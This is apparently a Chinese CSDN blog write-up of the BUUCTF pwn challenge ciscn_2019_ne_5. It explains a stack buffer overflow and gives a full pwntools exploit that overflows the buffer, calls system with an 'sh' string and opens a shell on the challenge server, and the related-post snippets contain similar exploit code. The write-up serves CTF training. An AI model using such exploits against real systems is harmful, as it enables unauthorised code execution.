ciscn_2019_ne_5

最新推荐文章于 2023-01-15 15:28:52 发布
最新推荐文章于 2023-01-15 15:28:52 发布
阅读量98 收藏
点赞数
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/121736876
版权

ciscn_2019_ne_5

查看保护
请添加图片描述
请添加图片描述
密码已经给了我们,直接上去然后就看见了三个选项,没有4,ida之后才看见了。
看一下add和getflag这两个函数
请添加图片描述
add这里的a1就是main中的src。
请添加图片描述
请添加图片描述
getflag中将src给copy到dest中,dest离ebp有0x48大小。而src离ebp有0xfc个大小,可以通过add写入rop的payload,然后让getflag来执行这个rop。这题可以正常的ret2libc也可以ret2text,这题的shell是/sh,一开始年朝着/bin/sh去了,没看见想着用了一下ret2libc。最后ropgadget发现了有个sh。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25608)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

r.recvuntil('Please input admin password:')
r.sendline('administrator')

def add(content):
    r.sendlineafter(':', '1')
    r.sendlineafter('Please input new log info:', content)

def getflag():
    r.sendlineafter(':', '4')

system_plt = elf.plt['system']
sh = 0x080482ea

p1 = b'a' * (0x48 + 4) + p32(system_plt) + b'aaaa' + p32(sh)
add(p1)
getflag()

r.interactive()
z1r0.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
UEFITool_NE_A51_win32.zip
12-24
UEFITool_NE_A51_win32
ciscn_2019_n_5
、moddemod
06-17 296
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1586
buuctf ciscn_2019_ne_5题目分析
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 1898
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
世界地形地图,giff栅格类型的图层,可以在Arcgis或QGIS中打开
ATOS.rar_ATOS NE_Atos
09-19
熟习无线传感器开发ATOS平台的使用和开发自己的传感器应用程序基于nesC语言
ciscn-2019-ne-3
最新发布
11-08
附件
NE2000_DRIVER.rar_NE2000
09-23
如题 这是一个NE2000的驱动开发程序历程,里面包含了代码和开发过程,读者可以自己整理一下 很容易
[CTF] ciscn_2019_ne_5
凉水的博客
06-13 461
ciscn_2019_ne_5
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 189
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 780
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1078
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
[PWN]ciscn_2019_ne_5
LDX的博客
11-27 259
PWN ciscn_2019_ne_5
【BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 160
【BUUCTFPWNciscn_2019_ne_5
ciscn_2019_ne_5【BUUCTF】
qq_41696518的博客
08-31 504
ciscn_2019_ne_5 BUUCTF
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 290
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
ffmpeg AV_NE
08-25
我可以告诉你关于FFmpeg中的AV_NE的信息。然而,根据你提供的引用内容,我无法找到与AV_NE相关的具体信息。可能是因为这个词组没有在你提供的引用中出现。如果你能提供更多的上下文或者详细的问题,我将会很乐意帮助...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值